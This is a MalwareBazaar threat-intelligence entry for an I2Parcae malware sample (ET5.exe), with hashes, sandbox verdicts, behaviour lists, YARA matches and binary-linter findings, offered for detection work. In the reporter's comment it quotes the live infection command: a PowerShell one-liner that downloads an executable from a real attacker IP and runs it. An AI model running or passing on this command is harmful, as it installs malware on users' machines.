MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

I2Parcae

Vendor detections: 10

SHA256 hash: e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4
SHA3-384 hash: 55b859069fab270026735832164615877ee53cf1162842dd6bc33c4481435317cedf4978b42859eb74963b4a1eb672f1
SHA1 hash: f88a8f1c1be4d07dafb27c65d36217eea4125020
MD5 hash: 98c7ec9eb9c760e176a78a01bcb9f91c
humanhash: glucose-july-green-four
File name: ET5.exe
Download: download sample
Signature: I2Parcae
File size: 17'157'120 bytes
First seen: 2024-12-06 13:15:30 UTC
Last seen: Never
File type: Executable exe
MIME type: application/x-dosexec
imphash: 4f8fac411df99d6d54fbaf68fa03582e (1 x I2Parcae)
ssdeep: 98304:H1ZlHoeoVRfsVhKgr4oC+64469EGG1vGP8PHHsfNOIGdQI:V7oeoTfsVoy4oC+6MEGC88Cp
TLSH: T16E074BBB77A59168C16DC13BC0638F00E93370B94B37C2E757A9066C9E629C45E3EB25
TrID:
  68.4% (.CPL) Windows Control Panel Item (generic) (57583/11/19)
  12.5% (.EXE) Win64 Executable (generic) (10522/11/4)
  11.8% (.EXE) DOS Borland compiled Executable (generic) (10000/1/2)
  2.4% (.EXE) OS/2 Executable (generic) (2029/13)
  2.3% (.EXE) Generic Win/DOS Executable (2002/3)
Magika: pebin
File icon (PE): PE icon
dhash icon: bcf0e4d4d4dcd4d4 (7 x I2Parcae, 1 x Rhadamanthys, 1 x DeerStealer)
Reporter: aachum
Tags: 45-202-33-25 exe I2Parcae


iamaachum
https://pc-softs.com/adobe-creative-cloud/ => (cmd /c start /min powershell $path='c:\users\public\ET5.exe';iwr http://45.202.33.25/her/ti.exe -outfile $path; start-process $path; start-process 'https://cutt.ly/2eXjaHtY';) => http://45.202.33.25/her/ti.exe

Intelligence

File Origin
# of uploads: 1
# of downloads: 392
Origin country: ES
Vendor Threat Intelligence
Malware family: n/a
ID: 1
File name: New Text Document.txt
Verdict: Malicious activity
Analysis date: 2024-12-06 13:05:01 UTC
Tags: loader evasion

Note: ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Verdict: Malicious
Score: 99.1%
Tags: shell virus sage
Result
Verdict: Malware
Maliciousness:
Behaviour
Creating synchronization primitives
Creating a window
Searching for synchronization primitives
Searching for the window
Restart of the analyzed sample
Connection attempt
Sending a custom TCP request
Creating a file in the %temp% directory
Launching cmd.exe command interpreter
Adding an exclusion to Microsoft Defender
Verdict: Likely Malicious
Threat level: 7.5/10
Confidence: 100%
Tags: adaptive-context embarcadero_delphi expand explorer fingerprint keylogger lolbin
Result
Verdict: UNKNOWN
Result
Threat name: n/a
Detection: malicious
Classification: troj.evad
Score: 100 / 100
Signature
Adds a directory exclusion to Windows Defender
AI detected suspicious sample
Antivirus detection for dropped file
Antivirus detection for URL or domain
Contains functionality to hide user accounts
Found Tor onion address
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
Multi AV Scanner detection for dropped file
NDIS Filter Driver detected (likely used to intercept and sniff network traffic)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Program Location with Network Connections
Behaviour
Behavior Graph: (graph rendering not reproduced) Behavior Graph ID: 1570047, Sample: ET5.exe, Startdate: 06/12/2024, Architecture: WINDOWS, Score: 100
Threat name: Win64.Trojan.Giant
Status: Malicious
First seen: 2024-12-06 14:21:36 UTC
AV detection: 10 of 24 (41.67%)
Threat level: 5/5
Result
Malware family: n/a
Score: 10/10
Tags: discovery evasion execution persistence
Behaviour
Kills process with taskkill
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Launches sc.exe
Executes dropped EXE
Loads dropped DLL
Modifies file permissions
Command and Scripting Interpreter: PowerShell
Creates new service(s)
Stops running service(s)
Suspicious use of NtCreateUserProcessOtherParentProcess
Unpacked files
SHA256 hash: e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4
MD5 hash: 98c7ec9eb9c760e176a78a01bcb9f91c
SHA1 hash: f88a8f1c1be4d07dafb27c65d36217eea4125020
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: BitcoinAddress
Author: Didier Stevens (@DidierStevens)
Description: Contains a valid Bitcoin address

Rule name: Borland
Author: malware-lu

Rule name: cobalt_strike_tmp01925d3f
Author: The DFIR Report
Description: files - file ~tmp01925d3f.exe
Reference: https://thedfirreport.com

Rule name: DebuggerCheck__API
Reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara

Rule name: html_auto_download_b64
Author: Tdawg
Description: html auto download

Rule name: MD5_Constants
Author: phoul (@phoul)
Description: Look for MD5 constants

Rule name: NET
Author: malware-lu

Rule name: pe_detect_tls_callbacks

Rule name: RansomPyShield_Antiransomware
Author: XiAnzheng
Description: Check for Suspicious String and Import combination that Ransomware mostly abuse (can create FP)

Rule name: Sus_Obf_Enc_Spoof_Hide_PE
Author: XiAnzheng
Description: Check for Overlay, Obfuscating, Encrypting, Spoofing, Hiding, or Entropy Technique (can create FP)

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download
Signature: I2Parcae
File: Executable exe e779e7c5dfba028f616eb4efc98523561e194c0cbb99192a9dab535f9d7936a4 (this sample)

BLint


The following table provides more information about this file using BLint. BLint is a binary linter that checks the security properties and capabilities of executables.

Findings
ID                 | Title                                                      | Severity
CHECK_AUTHENTICODE | Missing Authenticode                                       | high
CHECK_NX           | Missing Non-Executable Memory Protection                   | critical
CHECK_PIE          | Missing Position-Independent Executable (PIE) Protection   | high

Reviews
ID                | Capabilities                       | Evidence
COM_BASE_API      | Can Download & Execute components   | ole32.dll::CoCreateInstance, ole32.dll::CreateStreamOnHGlobal
MULTIMEDIA_API    | Can Play Multimedia                | gdi32.dll::StretchDIBits, winmm.dll::timeGetTime
SHELL_API         | Manipulates System Shell           | shell32.dll::ShellExecuteW
WIN32_PROCESS_API | Can Create Process and Threads     | kernel32.dll::CloseHandle, kernel32.dll::CreateThread
WIN_BASE_API      | Uses Win Base API                  | kernel32.dll::LoadLibraryExW, kernel32.dll::LoadLibraryA, kernel32.dll::LoadLibraryW, kernel32.dll::GetDriveTypeW, kernel32.dll::GetVolumeInformationW, kernel32.dll::GetSystemInfo
WIN_BASE_IO_API   | Can Create Files                   | kernel32.dll::CopyFileW, kernel32.dll::CreateDirectoryW, kernel32.dll::CreateFileMappingW, kernel32.dll::CreateFileW, kernel32.dll::DeleteFileW, kernel32.dll::GetSystemDirectoryW
WIN_BASE_USER_API | Retrieves Account Information      | kernel32.dll::GetComputerNameW, kernel32.dll::QueryDosDeviceW
WIN_REG_API       | Can Manipulate Windows Registry    | advapi32.dll::RegConnectRegistryW, advapi32.dll::RegCreateKeyExW, advapi32.dll::RegDeleteKeyW, advapi32.dll::RegLoadKeyW, advapi32.dll::RegOpenKeyExW, advapi32.dll::RegQueryInfoKeyW
WIN_USER_API      | Performs GUI Actions               | user32.dll::ActivateKeyboardLayout, user32.dll::AppendMenuW, user32.dll::CreateMenu, user32.dll::EmptyClipboard, user32.dll::FindWindowExW, user32.dll::FindWindowW
